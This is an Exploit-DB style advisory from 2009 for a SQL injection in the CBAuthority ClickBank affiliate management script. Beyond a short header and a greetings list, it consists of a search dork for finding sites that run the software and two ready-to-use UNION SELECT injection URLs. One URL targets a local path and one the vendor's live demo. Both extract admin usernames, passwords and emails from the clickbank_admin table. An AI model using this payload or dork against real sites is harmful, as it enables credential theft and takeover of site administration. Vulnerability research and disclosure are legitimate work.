CBAuthority - ClickBank Affiliate Management SQL Injection

EDB-ID:

9471


Platform:

PHP

Published:

2009-08-18

(o)===========================================================================================(o)

                 -:-          CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability       -:-


            Vendor : http://www.cbauthority.com/
            Author  : Angela Chang
            Contact : angel@ch4ng.cc
            Date     : 17 august 2009

(o)===========================================================================================(o)


Dork   :
   
       Powered by CBAuthority


Vulnerabilities   :

      http://localhost/path/main.php?command=view_product&id=-1 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--



Demo  :


      http://www.cbauthority.com/demo/main.php?command=view_product&id=-18 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--




(o)===========================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   str0ke


(o)===========================================================================================(o)

# milw0rm.com [2009-08-18]